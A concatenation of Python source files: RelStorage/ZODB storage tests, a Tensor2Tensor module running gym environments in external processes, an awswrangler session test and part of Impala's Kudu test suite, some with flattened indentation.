ADAPTER=self.get_adapter_zconfig()
)
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
        # Now, add some additional revisions. This proves that we iterate the
        # latest records, not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
        # (0, 1, 2) by default, or, e.g., (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
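# --- Hedged illustration (not part of the original test suite) ---
# The IStorageCurrentRecordIteration tests above walk record_iternext() one
# token at a time. This is a minimal sketch of how a caller would drain the
# whole iteration; `storage` is assumed to be any storage offering
# record_iternext (such as the instances these tests create). As
# check_record_iternext_too_large_oid shows, a token past the data raises
# StopIteration.
def _example_iter_current_records(storage):
    """Yield (oid, tid, data) for every current record in the storage."""
    token = None                # None means "start from the beginning"
    while True:
        oid, tid, data, token = storage.record_iternext(token)
        yield oid, tid, data
        if token is None:       # a None next-token marks the final record
            break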
class AbstractRSZodbConvertTests(StorageCreatingMixin,
ZlibWrappedFSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
# Zap the storage
self.make_storage(zap=True).close()
def make_storage(self, zap=True): # pylint:disable=arguments-differ
if self.relstorage_name == 'source':
meth = self._create_src_storage
else:
meth = self._create_dest_storage
storage = meth()
if zap:
storage.zap_all(slow=self.zap_slow)
return storage
def _cfg_header(self):
return '%import relstorage\n' + super(AbstractRSZodbConvertTests, self)._cfg_header()
def _cfg_relstorage(self, name, _path, blob_dir):
cfg = dedent("""
<relstorage>
%(rs_config)s
keep-history %(rs_keep_history)s
blob-dir %(rs_blobs)s
cache-prefix %(rs_name)s
cache-local-dir %(rs_cache_path)s
</relstorage>
""" % {
'rs_name': name,
'rs_keep_history': 'true' if self.keep_history else 'false',
'rs_blobs': blob_dir,
'rs_config': self.get_adapter_zconfig(),
'rs_cache_path': os.path.abspath('.'),
})
return cfg
def _cfg_one(self, name, path, blob_dir):
if name == self.filestorage_name:
meth = self._cfg_filestorage
else:
assert name == self.relstorage_name
meth = self._cfg_relstorage
return meth(name, path, blob_dir)
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
self.assertEqual(new_storage.copyTransactionsFrom,
new_storage.base.copyTransactionsFrom)
class AbstractRSDestHPZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = True
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSDestHFZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = False
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
src_db_needs_closed_before_zodbconvert = False
filestorage_name = 'destination'
relstorage_name = 'source'
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs.)
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
        self.__dst = 42 # Not None, so we don't try to create.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
        self.__dst = 42 # Not None, so we don't try to create.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
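# --- Hedged illustration (not part of the original test suite) ---
# A minimal sketch of the low-level two-phase-commit sequence that tests such
# as check99X1900Objects and the parallel-commit tests above drive by hand.
# It reuses names this module already imports (TransactionMetaData,
# zodb_pickle, MinPO); `storage` is assumed to be any open storage, e.g. one
# produced by make_storage() in these tests.
def _example_store_one_object(storage, value='example'):
    """Store one new object via the raw storage API; return (oid, tid)."""
    txn = TransactionMetaData()
    storage.tpc_begin(txn)                   # open the transaction on the storage
    oid = storage.new_oid()                  # allocate a fresh oid
    data = zodb_pickle(MinPO(value))         # pickle a trivial persistent object
    storage.store(oid, None, data, '', txn)  # stage it; None = no previous serial
    storage.tpc_vote(txn)                    # lock rows / detect conflicts
    tid = storage.tpc_finish(txn)            # make durable; returns the new tid
    return oid, tid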
|
batch_env_factory.py
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for creating batched environments."""
# The code was based on Danijar Hafner's code from tf.agents:
# https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py
# https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import os
import random
import signal
import subprocess
import sys
import traceback
from tensor2tensor.rl.envs import batch_env
from tensor2tensor.rl.envs import py_func_batch_env
from tensor2tensor.rl.envs import simulated_batch_env
import tensorflow as tf
def batch_env_factory(environment_spec, num_agents,
initial_frame_chooser=None, xvfb=False):
"""Factory of batch envs."""
if environment_spec.simulated_env:
cur_batch_env = _define_simulated_batch_env(
environment_spec, num_agents, initial_frame_chooser)
else:
cur_batch_env = _define_batch_env(environment_spec, num_agents, xvfb=xvfb)
return cur_batch_env
def _define_batch_env(environment_spec, num_agents, xvfb=False):
"""Create environments and apply all desired wrappers."""
with tf.variable_scope("environments"):
envs = [
ExternalProcessEnv(environment_spec.env_lambda, xvfb)
for _ in range(num_agents)]
env = batch_env.BatchEnv(envs, blocking=False)
env = py_func_batch_env.PyFuncBatchEnv(env)
return env
def _define_simulated_batch_env(environment_spec, num_agents,
initial_frame_chooser):
cur_batch_env = simulated_batch_env.SimulatedBatchEnv(
environment_spec, num_agents, initial_frame_chooser
)
return cur_batch_env
class ExternalProcessEnv(object):
"""Step environment in a separate process for lock free parallelism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
_ATTRIBUTE_EXCEPTION = 6
def __init__(self, constructor, xvfb):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
      xvfb: Whether to start an Xvfb virtual framebuffer for the environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._constructor = constructor
self._conn, conn = multiprocessing.Pipe()
if xvfb:
server_id = random.randint(10000, 99999)
auth_file_id = random.randint(10000, 99999999999)
xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id)
command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format(
server_id, xauthority_path)
with open(os.devnull, "w") as devnull:
proc = subprocess.Popen(command.split(), shell=False, stdout=devnull,
stderr=devnull)
atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL))
def constructor_using_xvfb():
os.environ["DISPLAY"] = ":{}".format(server_id)
os.environ["XAUTHORITY"] = xauthority_path
return constructor()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor_using_xvfb, conn))
else:
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
def __str__(self):
return "ExternalProcessEnv(%s)" % str(self._constructor)
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__("observation_space")
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__("action_space")
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call("step", action)
if blocking:
return promise()
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call("reset")
if blocking:
return promise()
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._ATTRIBUTE_EXCEPTION:
raise AttributeError(payload)
if message == self._RESULT:
return payload
raise KeyError("Received message of unexpected type {}".format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
try:
result = getattr(env, name)
conn.send((self._RESULT, result))
except AttributeError as err:
conn.send((self._ATTRIBUTE_EXCEPTION, err.args))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
env.close()
break
raise KeyError("Received message of unknown type {}".format(message))
except Exception: # pylint: disable=broad-except
stacktrace = "".join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter
tf.logging.error("Error in environment process: {}".format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
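# --- Hedged usage sketch (not part of the original module) ---
# The docstrings above describe a promise-style API: step()/reset() with
# blocking=False return callables that only block when invoked, letting
# several external processes run concurrently. The `gym` import and the
# "CartPole-v1" id below are assumptions for illustration only; any callable
# returning a gym-style environment works. This also assumes the default
# "fork" start method, since a lambda constructor is not picklable under
# "spawn".
if __name__ == "__main__":
  import gym  # assumed available; not a dependency of this module

  example_envs = [ExternalProcessEnv(lambda: gym.make("CartPole-v1"), xvfb=False)
                  for _ in range(2)]
  # Kick off resets in parallel, then block for the observations.
  reset_promises = [env.reset(blocking=False) for env in example_envs]
  observations = [promise() for promise in reset_promises]
  # Step every environment without waiting on any single one.
  step_promises = [env.step(env.action_space.sample(), blocking=False)
                   for env in example_envs]
  transitions = [promise() for promise in step_promises]
  print([t[1] for t in transitions])  # reward from each transition
  for env in example_envs:
    env.close()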
|
test_session.py
|
import multiprocessing as mp
import logging
import pytest
from awswrangler import Session
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
def assert_account_id(session):
account_id = (session.boto3_session.client("sts").get_caller_identity().get("Account"))
assert type(account_id) == str
@pytest.fixture(scope="module")
def default_session():
yield Session()
def test_session(default_session):
assert_account_id(default_session)
def test_session_region():
assert_account_id(Session(region_name="us-east-1"))
def test_from_boto3_session(default_session):
assert_account_id(Session(boto3_session=default_session.boto3_session))
def test_from_boto3_keys(default_session):
assert_account_id(
Session(
aws_access_key_id=default_session.aws_access_key_id,
aws_secret_access_key=default_session.aws_secret_access_key,
))
def test_from_boto3_region_name(default_session):
assert_account_id(Session(region_name=default_session.region_name))
def test_cpu_count():
assert_account_id(Session(procs_cpu_bound=1, procs_io_bound=1, botocore_max_retries=1))
def get_account_id_remote(primitives, account_id):
account_id.value = (primitives.session.boto3_session.client("sts").get_caller_identity().get("Account"))
def test_multiprocessing(default_session):
primitives = default_session.primitives
account_id = mp.Manager().Value(typecode=str, value=None)
proc = mp.Process(target=get_account_id_remote, args=(primitives, account_id))
proc.start()
proc.join()
assert type(account_id.value) == str
|
test_kudu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kudu.schema import (
BOOL,
DOUBLE,
FLOAT,
INT16,
INT32,
INT64,
INT8,
SchemaBuilder,
STRING,
BINARY,
UNIXTIME_MICROS)
from kudu.client import Partitioning
import logging
import pytest
import random
import textwrap
import threading
import time
from datetime import datetime
from pytz import utc
from tests.common.kudu_test_suite import KuduTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfKudu
from tests.common.test_dimensions import add_exec_option_dimension
from tests.verifiers.metric_verifier import MetricVerifier
KUDU_MASTER_HOSTS = pytest.config.option.kudu_master_hosts
LOG = logging.getLogger(__name__)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduOperations(KuduTestSuite):
"""
This suite tests the different modification operations when using a kudu table.
"""
@classmethod
def add_test_dimensions(cls):
super(TestKuduOperations, cls).add_test_dimensions()
# The default read mode of READ_LATEST does not provide high enough consistency for
# these tests.
add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_out_of_range_timestamps(self, vector, cursor, kudu_client, unique_database):
"""Test timestamp values that are outside of Impala's supported date range."""
cursor.execute("""CREATE TABLE %s.times (a INT PRIMARY KEY, ts TIMESTAMP)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "times"))
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "times"))
session = kudu_client.new_session()
session.apply(table.new_insert((0, datetime(1987, 5, 19, 0, 0, tzinfo=utc))))
# Add a date before 1400
session.apply(table.new_insert((1, datetime(1300, 1, 1, 0, 0, tzinfo=utc))))
# TODO: Add a date after 9999. There isn't a way to represent a date greater than
# 9999 in Python datetime.
#session.apply(table.new_insert((2, datetime(12000, 1, 1, 0, 0, tzinfo=utc))))
session.flush()
# TODO: The test driver should have a way to specify query options in an 'options'
# section rather than having to split abort_on_error cases into separate files.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/kudu-overflow-ts', vector,
use_db=unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/kudu-overflow-ts-abort-on-error', vector,
use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_scan_node(self, vector, unique_database):
self.run_test_case('QueryTest/kudu-scan-node', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert', vector, use_db=unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert_mem_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert_mem_limit', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_update(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_update', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_upsert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_upsert', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_delete(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_delete', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_partition_ddl(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_partition_ddl', vector, use_db=unique_database)
@pytest.mark.execute_serially
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_alter_table(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_alter', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_stats(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_stats', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_describe(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_describe', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_limit', vector, use_db=unique_database)
def test_kudu_column_options(self, cursor, kudu_client, unique_database):
"""Test Kudu column options"""
encodings = ["ENCODING PLAIN_ENCODING", ""]
compressions = ["COMPRESSION SNAPPY", ""]
nullability = ["NOT NULL", "NULL", ""]
defaults = ["DEFAULT 1", ""]
blocksizes = ["BLOCK_SIZE 32768", ""]
indx = 1
for encoding in encodings:
for compression in compressions:
for default in defaults:
for blocksize in blocksizes:
for nullable in nullability:
impala_tbl_name = "test_column_options_%s" % str(indx)
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY
%s %s %s %s, b INT %s %s %s %s %s) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name,
encoding, compression, default, blocksize, nullable, encoding,
compression, default, blocksize))
indx = indx + 1
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name))
def test_kudu_col_changed(self, cursor, kudu_client, unique_database):
"""Test changing a Kudu column outside of Impala results in a failure on read with
outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, i))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is type INT but Impala expected STRING. The table "\
"metadata in Impala may be outdated and need to be refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_not_null_changed(self, cursor, kudu_client, unique_database):
"""Test changing a NOT NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NOT NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
    # Load the table via the Kudu client and change col 's' to be nullable.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=True)
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, None))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is nullable but Impala expected it to be "\
"not nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_null_changed(self, cursor, kudu_client, unique_database):
"""Test changing a NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=False, default="bar")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, "foo"))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is not nullable but Impala expected it to be "\
"nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_added(self, cursor, kudu_client, unique_database):
"""Test adding a Kudu column outside of Impala."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
